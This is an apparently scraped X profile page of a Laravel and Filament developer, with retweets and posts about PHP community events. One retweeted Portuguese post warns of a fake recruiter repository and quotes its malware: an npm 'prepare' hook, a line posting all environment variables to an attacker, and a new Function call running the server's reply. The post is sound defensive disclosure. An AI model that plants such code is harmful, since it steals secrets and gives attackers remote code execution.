Leandro Ferreira

768 posts

Leandro Ferreira banner
Leandro Ferreira

Leandro Ferreira

@leandrocfe

Laravel developer, @filamentphp Core Team Member, creator of Filament Brazilian Community - https://t.co/5NhylVABSi

Araraquara - SP - Brasil Katılım Şubat 2014
430 Takip Edilen1.3K Takipçiler
Sabitlenmiş Tweet
Leandro Ferreira
Leandro Ferreira@leandrocfe·
I'm honored to be part of this team! 💛 I truly appreciate this opportunity and look forward to continuing my learning journey to contribute even more to this amazing Filament community! 🚀
Leandro Ferreira tweet media
English
16
6
149
9.1K
Leandro Ferreira retweetledi
Fabio Vedovelli
Fabio Vedovelli@vedovelli74·
⚠️ Devs, parem tudo e leiam. Quase rodei malware na minha máquina agora mesmo e quero que vocês saibam exatamente como funciona o golpe. Recebi um link de um repo no GitHub: um "MVP" de um projeto web3/poker, com pedido pra clonar e rodar localmente. Visual de teste técnico, daqueles que recruiter manda. Antes de tocar em qualquer coisa, parei e li o código pelo próprio GitHub, sem clonar. Bem que desconfiei. Era malware. E não um qualquer — tinha DOIS payloads que executam SOZINHOS, sem você rodar nada explicitamente. 🎯 Payload 1 — dispara no `npm install` O `package.json` tinha `"prepare": "node server/server.js"`. O detalhe maldoso: o script `prepare` roda AUTOMÁTICO toda vez que você dá `npm install`. Dentro dele, escondido nas rotas do servidor, um: `axios.post(url, { ...process.env })` Ou seja: ele empacota TODAS as suas variáveis de ambiente — chaves de AWS, tokens de API, secrets, seed phrase de carteira cripto — e manda pro servidor do atacante. E não para aí: a RESPOSTA do servidor é passada pra `new Function("require", resposta)(require)`. Isso é execução de código arbitrário, com acesso total ao Node: filesystem, child_process, rede. Ele pode roubar suas chaves SSH, instalar persistência, o que quiser. A URL do atacante? Escondida em base64 no `.env`, decodificando pra um domínio na Vercel. Disfarce em cima de disfarce.
Fabio Vedovelli tweet media
Português
29
184
780
410.7K
Leandro Ferreira retweetledi
Hassan Zahirnia
Hassan Zahirnia@HassanZahirnia·
Hey friends! 👋 I’m looking for new projects & opportunities✨🥰 Feel free to reach out or tag someone who might be looking 🙏 👇 Here's my portfolio: zahirnia.com
English
0
5
8
637
Leandro Ferreira retweetledi
pokemaobr.dev (de palco)
Comunidades Dev do Brasil, sua ajuda é crucial! 🇧🇷 Estamos mapeando as necessidades de eventos (presenciais/online) para que se mantenham acontecendo. Queremos fortalecer seus encontros! Participe: formcomunidades.pokemaobr.dev
Português
0
2
3
253
Leandro Ferreira retweetledi
Filament 🦒
Filament 🦒@filamentphp·
Attention Filament users: we’ve identified and resolved a few security vulnerabilities. To address these vulnerabilities in your applications, please update to the following versions: v3.3.52 v4.11.5 v5.6.5
English
3
37
224
27.4K
danielhe4rt.php
danielhe4rt.php@danielhe4rt·
claude pague minhas contas não cometa erros
Português
4
32
203
5.4K
Leandro Ferreira retweetledi
PhpStorm, a JetBrains IDE
PhpStorm, a JetBrains IDE@phpstorm·
Hey @laravel developers! Now you can manage and troubleshoot your Laravel Cloud deployments, including with AI assistance, in PhpStorm’s new Laravel tool window. Anything missing? We’d love to hear your feedback! 👂
PhpStorm, a JetBrains IDE tweet media
English
6
15
84
11.6K
Leandro Ferreira retweetledi
Harris Raftopoulos
Harris Raftopoulos@harrisrafto·
Pest. Larastan. Pint. Laravel Zero. OpenAI PHP. PHP Insights. You've been using @enunomaduro's tools for years. On June 11th, you can meet him at our next Laravel Greece meetup in Athens. RSVP 👇 luma.com/d36uzjdu
English
1
10
24
1.7K
danielhe4rt.php
danielhe4rt.php@danielhe4rt·
i'm literally refactoring a BUNCH of bad decisions using /grill-with-docs from @mattpocockuk holy shit i should give it a try earlier. simply addicted and now my codebase has a really good context mapping, with readable decisions
English
4
1
55
11.9K
Leandro Ferreira retweetledi
Filament 🦒
Filament 🦒@filamentphp·
We’re excited to announce that we now have another great premium plugin distribution partner to help you get your work in the hands of your users: Privato! More information at the blog post linked in the replies.
English
1
5
52
7.1K
Punyapal Shah
Punyapal Shah@MrPunyapal·
Happy Birthday @enunomaduro 🎁🎂 Thanks for everything you done for PHP and Laravel community ❤️ 💜
Punyapal Shah tweet media
English
3
2
41
1.8K
nunomaduro
nunomaduro@enunomaduro·
o bagulho tá doido 🇧🇷
nunomaduro tweet media
Português
10
1
153
4.5K
nunomaduro
nunomaduro@enunomaduro·
after literally making history yesterday.. we are not done.. tonight: php sp special @laravelphp.. see you soon 🐘
nunomaduro tweet media
English
2
3
67
3.3K
Leandro Ferreira retweetledi
nunomaduro
nunomaduro@enunomaduro·
Laravel / Php Brazil, this is for you 💛
English
8
13
181
7.4K
nunomaduro
nunomaduro@enunomaduro·
Just use laravel
nunomaduro tweet media
English
7
6
125
4.5K